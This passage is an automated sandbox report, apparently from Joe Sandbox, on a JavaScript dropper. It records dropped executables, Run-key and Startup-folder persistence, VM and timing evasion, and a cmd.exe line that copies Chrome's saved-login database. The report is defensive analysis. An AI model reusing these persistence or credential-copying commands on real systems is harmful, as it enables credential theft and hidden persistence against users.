Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129A710 NtOpenProcessToken, 18_2_0129A710
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299760 NtOpenProcess, 18_2_01299760
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299770 NtSetInformationFile, 18_2_01299770
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0129A770 NtOpenThread, 18_2_0129A770
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012997A0 NtUnmapViewOfSection, 18_2_012997A0
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299780 NtMapViewOfSection, 18_2_01299780
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299610 NtEnumerateValueKey, 18_2_01299610
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299670 NtQueryInformationProcess, 18_2_01299670
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299650 NtQueryValueKey, 18_2_01299650
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012996D0 NtCreateKey, 18_2_012996D0
PE file does not import any functions
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Source: u8g48fg0phzxan.exe.3.dr Static PE information: No import functions for PE file found
Source: u8g48fg0phzxan.exe0.3.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: CIQ-PO162688.js Initial sample: Strings found which are bigger than 50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: u8g48fg0phzxan.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: u8g48fg0phzxan.exe0.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: bin.exe.0.dr Static PE information: Section .text
Source: u8g48fg0phzxan.exe.3.dr Static PE information: Section .text
Source: u8g48fg0phzxan.exe0.3.dr Static PE information: Section .text
Source: CIQ-PO162688.js Virustotal: Detection: 25%
Source: CIQ-PO162688.js ReversingLabs: Detection: 15%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO162688.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmiIjXZkdd.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmiIjXZkdd.js" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\RmiIjXZkdd.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@19/7@54/13
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Irlr8ftbp Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities Jump to behavior
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C5D0D1 push ecx; ret 2_2_00C5D0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C5D0D1 push ecx; ret 9_2_00C5D0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004BC928 push cs; retf 9_2_004BC935
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B492D push eax; ret 9_2_004B492E
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C72B3 push eax; retf 9_2_004C72B4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CEB3B push dword ptr [7D52CE57h]; ret 9_2_004CEB5E
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD67B push eax; ret 9_2_004CD6E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD672 push eax; ret 9_2_004CD678
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD625 push eax; ret 9_2_004CD678
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD6DC push eax; ret 9_2_004CD6E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0120C928 push cs; retf 18_2_0120C935
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0120492D push eax; ret 18_2_0120492E
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121EB3B push dword ptr [7D52CE57h]; ret 18_2_0121EB5E
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012172B3 push eax; retf 18_2_012172B4
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D625 push eax; ret 18_2_0121D678
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D672 push eax; ret 18_2_0121D678
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D67B push eax; ret 18_2_0121D6E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D6DC push eax; ret 18_2_0121D6E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012AD0D1 push ecx; ret 18_2_012AD0E4
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: CIQ-PO162688.js String : entropy: 5.58, length: 340222, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gI>@ZpZ2hRWEp5WVhrdWNISnZkRzkwZVhCbExtWnZja1ZoWTJnZ1B5QkJjbkpoZVM1d2NtOT Go to definition
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\help.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ZLPXAJ4HOH Jump to behavior
Drops script or batch files to the startup folder
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmiIjXZkdd.js Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmiIjXZkdd.js Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmiIjXZkdd.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000FC8C04 second address: 0000000000FC8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000FC8F9E second address: 0000000000FC8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000004B8C04 second address: 00000000004B8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000004B8F9E second address: 00000000004B8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe RDTSC instruction interceptor: First address: 0000000001208C04 second address: 0000000001208C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe RDTSC instruction interceptor: First address: 0000000001208F9E second address: 0000000001208FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5504 Thread sleep time: -70000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 5936 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 5936 Thread sleep time: -80000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C46DE6 rdtsc 2_2_00C46DE6
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\bin.exe API coverage: 6.1 %
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe API coverage: 2.3 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1660 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1660
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1659 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: wscript.exe, 00000004.00000002.928037378.0000014D0BB20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpl
Source: explorer.exe, 00000003.00000000.450562950.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.450562950.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
Source: explorer.exe, 00000003.00000000.450731123.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: explorer.exe, 00000003.00000000.450731123.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
Source: wscript.exe, 00000001.00000002.908099402.0000022182291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.928103239.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856423379.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882649285.0000026A5198D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716410093.0000026A5198D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.883116107.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.715463663.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926117959.0000026A51983000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882795550.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.450731123.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.405102781.00000000042EE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: explorer.exe, 00000003.00000000.441137701.00000000042A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C46DE6 rdtsc 2_2_00C46DE6
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8CD6 mov eax, dword ptr fs:[00000030h] 2_2_00CD8CD6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C058EC mov eax, dword ptr fs:[00000030h] 2_2_00C058EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC14FB mov eax, dword ptr fs:[00000030h] 2_2_00CC14FB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 2_2_00C86CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 2_2_00C86CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 2_2_00C86CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09080 mov eax, dword ptr fs:[00000030h] 2_2_00C09080
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C83884 mov eax, dword ptr fs:[00000030h] 2_2_00C83884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C83884 mov eax, dword ptr fs:[00000030h] 2_2_00C83884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1849B mov eax, dword ptr fs:[00000030h] 2_2_00C1849B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 mov eax, dword ptr fs:[00000030h] 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 mov eax, dword ptr fs:[00000030h] 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 mov eax, dword ptr fs:[00000030h] 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 mov eax, dword ptr fs:[00000030h] 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 mov eax, dword ptr fs:[00000030h] 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 mov eax, dword ptr fs:[00000030h] 2_2_00C320A0
